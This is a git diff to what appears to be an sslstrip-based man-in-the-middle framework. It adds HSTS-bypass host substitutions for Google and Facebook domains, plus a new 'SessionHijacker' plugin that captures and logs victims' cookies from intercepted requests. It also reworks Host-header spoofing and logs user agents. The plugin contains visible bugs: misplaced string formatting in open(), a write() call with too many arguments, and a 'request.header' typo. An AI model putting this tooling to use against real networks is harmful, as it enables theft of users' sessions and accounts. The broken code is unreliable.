diff --git a/config_files/hsts_bypass.cfg b/config_files/hsts_bypass.cfg index 2b02ed0..06d1ece 100644 --- a/config_files/hsts_bypass.cfg +++ b/config_files/hsts_bypass.cfg @@ -7,4 +7,5 @@ mail.google.com = gmail.google.com accounts.google.se = cuentas.google.se #for facebook -www.facebook.com = social.facebook.com \ No newline at end of file +www.facebook.com = social.facebook.com +facebook.com = social.facebook.com \ No newline at end of file diff --git a/plugins/SessionHijacker.py b/plugins/SessionHijacker.py new file mode 100644 index 0000000..22d9259 --- /dev/null +++ b/plugins/SessionHijacker.py @@ -0,0 +1,30 @@ +from plugins.plugin import Plugin +import os +import argparse +import logging + +class SessionHijacker(Plugin): + name = "Session Hijacker" + optname = "hijack" + desc = "Performs session hijacking attacks against clients" + implements = ["sendHeaders"] + has_opts = False + + def initialize(self, options): + '''Called if plugin is enabled, passed the options namespace''' + self.options = options + self.log_clients = options.clients + + def sendHeaders(self, request): + for header, value in request.headers.items(): + if header == 'cookie': + if self.log_clients: + log_file = open('./logs/%s.log', 'a' % request.client.getClientIP()) + log_file.write(request.header['host'], value, "\n") + log_file.close() + + logging.info("%s %s << Wrote cookie to logfile" % (request.client.getClientIP(), request.headers['host'])) + else: + logging.info("%s %s << Got cookie: %s" % (request.client.getClientIP(), request.headers['host'], value)) + + #def add_options(options): \ No newline at end of file diff --git a/sslstrip/ClientRequest.py b/sslstrip/ClientRequest.py index 091ef0d..77de420 100644 --- a/sslstrip/ClientRequest.py +++ b/sslstrip/ClientRequest.py @@ -94,7 +94,10 @@ class ClientRequest(Request): client = self.getClientIP() path = self.getPathFromUri() - self.content.seek(0,0) + try: + self.content.seek(0,0) + except: + pass postData = self.content.read() url = 'http://' + host + path diff --git a/sslstrip/ClientRequestHSTS.py b/sslstrip/ClientRequestHSTS.py index 260732b..b47c7d7 100644 --- a/sslstrip/ClientRequestHSTS.py +++ b/sslstrip/ClientRequestHSTS.py @@ -76,11 +76,22 @@ class ClientRequest(Request): del headers['if-none-match'] if 'host' in headers: - host = self.urlMonitor.URLgetRealHost("%s" % headers['host']) - logging.debug("Modifing HOST header: %s -> %s" % (headers['host'],host)) - headers['host'] = host - headers['securelink'] = '1' - self.setHeader('Host',host) + real_host = self.urlMonitor.URLgetRealHost("%s" % headers['host']) + #logging.info("Modifing HOST header: %s -> %s" % (headers['host'],host)) + if 'www.' in real_host: + fake_host = 'w' + real_host + headers['host'] = fake_host + fake_host = self.urlMonitor.URLgetRealHost("%s" % headers['host']) + headers['securelink'] = '1' + self.setHeader('Host', fake_host) + logging.info("Modifing HOST header: %s -> %s" % (real_host,fake_host)) + else: + fake_host = 'web' + real_host + headers['host'] = fake_host + fake_host = self.urlMonitor.URLgetRealHost("%s" % headers['host']) + headers['securelink'] = '1' + self.setHeader('Host', fake_host) + logging.info("Modifing HOST header: %s -> %s" % (real_host,fake_host)) return headers @@ -112,7 +123,12 @@ class ClientRequest(Request): host = self.urlMonitor.URLgetRealHost("%s" % lhost) client = self.getClientIP() path = self.getPathFromUri() - self.content.seek(0, 0) + + try: + self.content.seek(0, 0) + except: + pass + postData = self.content.read() real = self.urlMonitor.real patchDict = self.urlMonitor.patchDict diff --git a/sslstrip/ServerConnection.py b/sslstrip/ServerConnection.py index 1210c92..d2fd879 100644 --- a/sslstrip/ServerConnection.py +++ b/sslstrip/ServerConnection.py @@ -54,7 +54,7 @@ class ServerConnection(HTTPClient): def sendRequest(self): if self.command == 'GET': - logging.info("%s Sending Request: %s %s" % (self.client.getClientIP(), self.command, self.headers['host'])) + logging.info("%s Sending Request: %s %s %s" % (self.client.getClientIP(), self.command, self.headers['host'], self.headers['user-agent'])) self.plugins.hook() self.sendCommand(self.command, self.uri) @@ -100,8 +100,8 @@ class ServerConnection(HTTPClient): if (value.find('gzip') != -1): logging.debug("Response is compressed...") self.isCompressed = True - if (key.lower() == 'strict-transport-security'): - value = 'max-age=0' + #if (key.lower() == 'strict-transport-security'): + # value = 'max-age=0' elif (key.lower() == 'content-length'): self.contentLength = value diff --git a/sslstrip/ServerConnectionFactory.py b/sslstrip/ServerConnectionFactory.py index 793bdc6..f694fc0 100644 --- a/sslstrip/ServerConnectionFactory.py +++ b/sslstrip/ServerConnectionFactory.py @@ -40,5 +40,7 @@ class ServerConnectionFactory(ClientFactory): logging.debug("Retrying via SSL") self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443) else: - self.client.finish() - + try: + self.client.finish() + except: + pass diff --git a/sslstrip/URLMonitorHSTS.py b/sslstrip/URLMonitorHSTS.py index 35262ce..164da92 100644 --- a/sslstrip/URLMonitorHSTS.py +++ b/sslstrip/URLMonitorHSTS.py @@ -64,14 +64,14 @@ class URLMonitor: #LEO: Sustituir HOST if not self.sustitucion.has_key(host): - lhost = host[:4] - if lhost=="www.": + lhost = host[:4] + if lhost=="www.": self.sustitucion[host] = "w"+host self.real["w"+host] = host - else: + else: self.sustitucion[host] = "web"+host self.real["web"+host] = host - #logging.info("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) ) + logging.info("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) ) url = 'http://' + host + path #logging.debug("LEO stripped URL: %s %s"%(client, url))